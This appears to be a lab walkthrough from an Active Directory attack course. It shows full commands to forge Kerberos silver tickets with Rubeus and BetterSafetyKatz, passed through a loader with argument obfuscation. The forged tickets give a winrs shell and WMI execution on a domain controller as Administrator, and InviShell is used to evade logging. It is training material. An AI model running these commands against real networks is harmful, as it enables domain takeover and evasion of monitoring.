Task 1
Try to get command execution on the domain controller by creating silver ticket for:
Use the NTLM or AES hash of dcorp-dc to forge and import ticket:
Here, we use Rubeus for HTTP service.
Copy # ArgSplit for "silver"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
Since the ticket is imported, we can get a shell as DC and execute commands.
Copy C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
C:\Users\Administrator>set username
set username
USERNAME=Administrator
C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
Let's also use SafetyKatz for WMI.
To access WMI, we need two tickets, one for HOST and another for RPCSS.
Let's get one for HOST first:
Copy C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Now for RPCSS:
Copy C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
We can now check if the tickets are imported using klist
We can now run WMI commands on DC.
Copy # Run InviShell
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# Run WMI command on DC
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName
dcorp-dc
Last updated 3 months ago